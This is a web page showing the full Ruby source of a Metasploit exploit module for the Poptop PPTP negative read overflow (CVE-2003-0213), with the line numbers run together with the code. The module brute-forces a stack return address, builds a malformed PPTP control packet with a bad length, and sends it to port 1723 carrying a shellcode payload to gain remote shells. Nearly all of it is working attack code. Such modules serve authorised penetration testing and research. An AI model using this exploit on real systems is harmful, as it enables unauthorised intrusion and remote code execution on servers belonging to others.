Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/pptp/poptop_negative_read.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Brute1011def initialize(info = {})12super(update_info(info,13'Name' => 'Poptop Negative Read Overflow',14'Description' => %q{15This is an exploit for the Poptop negative read overflow. This will16work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I17currently do not have a good way to detect Poptop versions.1819The server will by default only allow 4 concurrent manager processes20(what we run our code in), so you could have a max of 4 shells at once.2122Using the current method of exploitation, our socket will be closed23before we have the ability to run code, preventing the use of Findsock.24},25'Author' => 'spoonm',26'License' => MSF_LICENSE,27'References' =>28[29['CVE', '2003-0213'],30['OSVDB', '3293'],31['URL', 'http://securityfocus.com/archive/1/317995'],32['URL', 'http://www.freewebs.com/blightninjas/'],33],34'Privileged' => true,35'Payload' =>36{37# Payload space is dynamically determined38'MinNops' => 16,39'StackAdjustment' => -1088,40'Compat' =>41{42'ConnectionType' => '-find',43}44},45'SaveRegisters' => [ 'esp' ],46'Platform' => 'linux',47'Arch' => ARCH_X86,48'Targets' =>49[50['Linux Bruteforce',51{ 'Bruteforce' =>52{53'Start' => { 'Ret' => 0xbffffa00 },54'Stop' => { 'Ret' => 0xbffff000 },55'Step' => 056}57}58],59],60'DefaultTarget' => 0,61'DisclosureDate' => '2003-04-09'))6263register_options(64[65Opt::RPORT(1723)66])6768register_advanced_options(69[70OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]),71OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]),72OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. " +73"ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). " +74"If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " +75"(these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),76OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]),77OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),78])79end8081# Dynamic payload space calculation82def payload_space(explicit_target = nil)83datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i84end8586def build_packet(length)87[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +88[1,0].pack('cc') +89[0].pack('n') +90[1,1,0,2600].pack('NNnn') +91datastore['Hostname'].ljust(64, "\x00") +92datastore['Vendor'].ljust(64, "\x00")93end9495def check96connect97sock.put(build_packet(156))98res = sock.get_once99100if res and res =~ /MoretonBay/101return CheckCode::Detected102end103104return CheckCode::Safe105end106107def brute_exploit(addrs)108connect109110print_status("Trying #{"%.8x" % addrs['Ret']}...")111112# Construct the evil length packet113packet =114build_packet(1) +115payload.encoded +116([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))117118sock.put(packet)119120handler121disconnect122end123end124125126